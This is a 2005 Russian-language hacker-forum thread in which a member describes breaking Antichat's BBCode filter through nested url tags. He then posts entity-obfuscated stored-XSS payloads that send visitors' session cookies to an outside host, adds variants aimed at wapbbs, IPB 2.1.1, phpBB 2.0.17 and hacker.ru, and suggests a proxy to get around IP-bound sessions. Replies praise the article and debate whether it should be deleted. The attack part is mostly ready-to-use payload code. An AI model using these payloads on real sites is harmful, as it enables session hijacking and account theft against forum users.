Авторские статьи Долго жданная статья как ломать античатовскй форум.

Discussion in 'Статьи' started by rat, 17 Oct 2005.

Thread Status:
Not open for further replies.
  1. rat

    rat Banned

    Joined:
    15 Aug 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    2
    Начал Я изучать форум античата с Января этого года.

    Бла бла под конец - Я его взломал.

    Вот как Я его ломал.



    Должен сказать сразу, что после того как Я нашёл багу на античате, Я сразу рассказал её четырём юзером античата.

    Сначало Zadoxlik`у, потом моему лучшему другу на интернете xSpider`у и третьему человеку Я рассказал Jazzsummerman, который потом случайно рассказал Че Геваре который и прикрыл эту багу прежде тем, как Я ей сумел воспользовался. Без обид, что было то было.

    Объяснять красивым языком как Алгол, Zadoxlik Jazzsummerman Я ещё не научился, так что расскажу как могу.




    Первоначальная ошибка состоит в том, что теги
    HTML:
    [url=http://www.antichat.ru]http://www.antichat.ru[url]
    и

    HTML:
    [url]http://www.antichat.ru[/url]
    очень плохо отфильтрированны.


    Перебрав десятки комбинаций и изучив все теги античатовского форума, Я решил засунуть один тег урл в другой тег урл.

    Вот так:

    HTML:
    [URL=http://www.wj.com[url]http://www.wj.com]wj [/url][/URL]
    В результате, Я получил следующее:

    HTML:
    <a href="http://www.wj.com<a href=&quot;http://www.wj.com" target="_blank">wj" target="_blank">http://www.wj.com]wj </a></a>
    Думаю тут всё и так ясно. Второй тег урл, зашёл в атрибут первого тега урл.

    После этого, Я задал такой запрос античатовскому форуму:

    HTML:
    [URL=http://www.wj.com[url]http://www.wj.com]wj [FONT=Arial]wj[/FONT][/url][/URL]

    И вот что он мне выдал:

    HTML:
    <a href="http://www.wj.com<a href=&quot;http://www.wj.com" target="_blank">wj <font face=&quot;Arial&quot;>wj</font>" target="_blank">http://www.wj.com]wj <font face="Arial">wj</font></a></a>[HTML]
    
    Как уже заметно, из-за того, что теги урл фильтрируют все кавычки, nj второй тег урл отфильтрировал кавычки в теги фонт, после чего кавычки перестали существовать вообще, что Я и сам сразу не заметил. И естественно теперь одним пробелом, который как специально для нас разрешён (Тут можно прочитать подробнее о том, что становится когда кавычек нет и добавляется пробел http://www.antichat.ru/crackchat/index.html )
    мы теперь можем вписывать произвольной код.
    
    
    Долго не буду рассказывать, что пропускается в каждом теги античата, которые мне пришлось из-за нужды вызубрить наизусть, но просто скажу, что в теги фонт, не пропускается двоеточие.  [COLOR=DarkSlateBlue]<:>[/COLOR] Эта проблема меня заставила искать помощь у других Хакеров античата.
    
    Естественно мне помог мой лучший друг по имени хSpider которые посоветовал мне использовать html объекты.
    
    Должен сказать, что алёрт у меня был и без них, через такой код.
    
     [HTML][URL=http://www.wj.com[url]http://www.wj.com]wj [FONT=Arial size=+7 onmouseover=alert(/Hello_from_WJ/) /]wj[/FONT][/url][/URL]
    Результат:

    HTML:
    <a href="http://www.wj.com<a href=&quot;http://www.wj.com" target="_blank">wj <font face=&quot;Arial size=100 onmouseover=alert(/Hello_from_WJ/) /&quot;>wj</font>" target="_blank">http://www.wj.com]wj &lt;font face=&quot;Ar.../) /&quot;&gt;wj&lt;/font&gt;</a></a>
    При проведении мышки на WJ, выскакивал алёрт.

    Мне захотелось пойти дальше и xSpider мне помог заменить двоеточие ( ":" ) этим символом.
    Знаю, Я и сам удился. Сто раз про это читал и т.д. и только вспомнил, что он есть и им можно воспользовался. Ещё давно мне даже Железо показывал мылы тырить через эти символы, но почему то мне это не пришло в голову.

    После этого, используя эту ссылку, http://www.h4cky0u.org/encrypt/index.php Я закодировал свой код? и вот что меня получилось....



    HTML:
    [URL=wj[url]http://www.][FONT=Arial size=20 style=background&*#58;url(javascript*&***#58;document.im*ages*&#91*;1&#9*3;.s*rc=&#*34;&#*104;&*#116;*&#11*6;&#*112;*&#58*;&#47*;&#47*;&#97*;&#1*10;&#*116;*&#105*;&#9*9;&#1*04;&#*97;&*#116*;&#46*;&#11*4;&#*117;*/*c*&#10*3;&#1*05;&*#45;&*#98;&*#105;**&#1*10;/s.jpg?"+document.cookie); / ]wj [/url][/FONT][/URL][HTML
    
    
    Это воровало куки на ура.
    
    
    Вот код для желающих как ломать веб-хак.
    
    [HTML][color=white][EMAIL][URL=wj`=`][/URL][/EMAIL][/color][color=white]` style=`background:url(javaSCrip	t:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/color]
    Можно ещё и так

    HTML:
    [EMAIL][email protected][URL=wj/style=background&*#58;url(javascript*:document.image*s&#9*1;&#*49;].*src=*"*&#104*;&#11*6;&#1*16;&*#112*;&#5*8;&#*47;&#*47;&#*97;&#*110;*&#116*;&#1*05;&#*99;&*#104;*a*&#11*6;&#*46;&#*114;&*#117*;&#4*7;&#9*9;&#1*03;&*#105;*&#45*;&#98*;&#10*5;&#1*10;&*#47;s.j&*#112;g?"+document.cookie); ][/URL][/EMAIL]

    Для интересующихся как Я ломал форум wapbbs, вот вам один из кодов.

    HTML:
    [r0x][img]http://www.phpbb.com/значениеwjimages/phplogo.gif/style=background&*#58;url(*&#106*;&#9*7;&#1*18;&*#97;&*#115*;&#99*;&#11*4;&#1*05;&#*112;*&#116*;&#58*;&#1*00;&#*111;&*#99;&*#117;*&#109*;&#1*01;&#*110;&*#116*;&#46*;&#10*5;&#1*09;&*#97;*g&#1*01;&*#115;*[*1*]*.src*=&#3*4;&#*104;*&#116*;&#11*6;&#1*12;&*#58;&*#47;*/*&#97*;&#11*0;&#1*16;&*#105*;&#99*;&#10*4;&#*97;&*#116;*.*&#11*4;&#1*17;&*#47;&*#99;&*#103;*&#10*5;&#4*5;&#9*8;&#1*05;&*#110;*/*&#115*;&#46*;&#10*6;&#*112;*&#103*;&#63*;&#34*;+&#1*00;&#*111;*&#99*;ument.cookie); [/img][/r0x]
    Вот второй

    HTML:
    [url]http://www.wj.com[img]http://www.wapbbs.com/bbs//images/statusicon/forum_new.gif'='[/img][/url]'
    Код воровки кук скопируйте с первого примера.

    Так как к кукам wapbbs привязывается ещё и ИП, то это можно обойти с помощью burp proxy.
    http://www.portswigger.net/proxy/

    Сейчас вышли новые форумы, например IPB 2.1.1 и он ломается вот так:

    HTML:
    [post=1000[topic=wj style=background&*#58;url(javascript*:document.image*s&#9*1;&#*49;].*src=*"*&#104*;&#11*6;&#1*16;&*#112*;&#5*8;&#*47;&#*47;&#*97;&#*110;*&#116*;&#1*05;&#*99;&*#104;*a*&#11*6;&#*46;&#*114;&*#117*;&#4*7;&#9*9;&#1*03;&*#105;*&#45*;&#98*;&#10*5;&#1*10;&*#47;s.j&*#112;g?"+document.cookie); ]	[/topic]]
    [/post]
    

    Форум phpbb 2.0.17 ломается вот так: (Код надо будет если время и желание будет - доработать.)

    HTML:
    [img]http://www.phpbb.com/wj[email][email protected][/email]images/phplogo.gif[/img]
    phpbb 2.0.17



    Структура форума хакер.ру, ломается вот так.

    HTML:
    [URL][img]http://www.wj'='.gif[/img][/URL]'
    А так же в самом заголовке и имени тем на этом форуме, разрешается вставка тегов, причём там очень плохая фильтрация. При специальных символах, этот форум ломается на ура как и в теле сообщения, так и в заголовке топиков.



    Вот и всё.



    White Jordan.
     
  2. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Ща попробую на других форумах статья так не чё.
     
  3. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3
    На сколько я понял вы действовали вместе ?
     
  4. alsa

    alsa Banned

    Joined:
    29 Mar 2005
    Messages:
    220
    Likes Received:
    19
    Reputations:
    15
    Зачем забанили такого хорошего автора ? %-)
     
  5. alsa

    alsa Banned

    Joined:
    29 Mar 2005
    Messages:
    220
    Likes Received:
    19
    Reputations:
    15
    21:40:17: скажи вандалу что нет
    21:40:22: работал Я один
    21:40:27: топик ответь
    21:40:29: Я не могу пока
    21:40:42: скажи Белый Джордан говорит что нет
    21:40:45: он напомнил
    21:40:50: как уже сказал в статье
    21:40:53: работал сам
    21:41:02: так что хСпайдера за это баннить не стоит
    21:41:08: он тут не причём скажи
    21:41:14: а то мали ли что
    21:41:20: и впрямь бан ему влепят
     
  6. silveran

    silveran Фрикер

    Joined:
    2 May 2005
    Messages:
    771
    Likes Received:
    7
    Reputations:
    2
    кстати если кому интересно- то он нацелен на то что щас пол ачата ломанётся вапс ломать- люди не советую!!! поимите- не стоит идти на поводу и из за него портить всем жизнь!! запомните- НЕ ДЕЛАЙТЕ ЭТОГО!!! не будте марионетками к его руках!!! если хотите проверить- то проверяйте не на его примерах!
     
  7. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    а че его примеры тебе не нравятся то?? Типо у остального ачата они лучше?!
     
  8. silveran

    silveran Фрикер

    Joined:
    2 May 2005
    Messages:
    771
    Likes Received:
    7
    Reputations:
    2
    гыыыыыыыы.... я говорю не риньтесь с дуру веше=ать хакер и вапс- проверяйте для начала на однотипных сайтах)
    в будующем советую немного сдержаннее реагировать на мои сообщения)
    С Уважением Силверан)))
     
  9. -artik-

    -artik- Banned

    Joined:
    13 Jun 2005
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    чет я не понял как с помощью этого - [​IMG] ломануть phpbb 2.0.17
     
  10. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    Я так понимаю что для гринов угрозы никакой не было, т.к. надеюсь что все давно пересели на файрофкс или что-то в этом духе.
     
  11. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    Тему еще не закрыли, и не удалили?)) Удивительно.
     
  12. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    Отличная статья. С другой стороны автор приследовал явно не хорошие цели.
    А вообще позновательно.
     
  13. FoX's

    FoX's Дохлый

    Joined:
    26 Dec 2004
    Messages:
    169
    Likes Received:
    29
    Reputations:
    0
    Норм статья... хоть wj мне не очень нравиться
     
  14. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    А я думаю удаляйте ей быстрее а то весь инет разнесут!
     
  15. SladerNon

    SladerNon Адам

    Joined:
    6 Mar 2005
    Messages:
    1,636
    Likes Received:
    936
    Reputations:
    355
    Угу..., но не надо было это рассказывать..., ех...

    А так конечно молодец!. 5+ и безусловно +b =).
     
  16. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Я говорю закрываете быстрее то плохо всем сайтам будет!
     
  17. SladerNon

    SladerNon Адам

    Joined:
    6 Mar 2005
    Messages:
    1,636
    Likes Received:
    936
    Reputations:
    355
    SanyaX - ну понимаешь в чём дело =). По идеи можно вообще ни о чём не говорить, ни какие уязвимости не показывать, и вообще закрыть все порталы касающиеся безопасности в сети. Тогда всем сайтам будет хорошо?. =). Не думаю...
     
  18. zhelezo

    zhelezo Member

    Joined:
    24 Oct 2004
    Messages:
    10
    Likes Received:
    8
    Reputations:
    5
    кстати интерено что за ажиотаж?
    тот кто более или менее знаком с материалами античата, сам влегкую может такие же уязвимости найти. нового мало.
    Вайт Джордан правда молодец, что на нашем пропатченном спеуиализированном форуме лазейку нашел




    -------------
    Алсу сосет
     
  19. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Вайт Джордан - молоток, что не поленился и кропотливо иследовал.
    Если бы не твоя манера Якать и себя возвеличивать - цены бы тебе небыло. Имхо.
     
    _________________________
  20. Laggi

    Laggi Elder - Старейшина

    Joined:
    19 Aug 2005
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    А вот что на счет phpBB... Ничего интересного не вижу пока :( Там проверка на скрипты и т.п.
     
Thread Status:
Not open for further replies.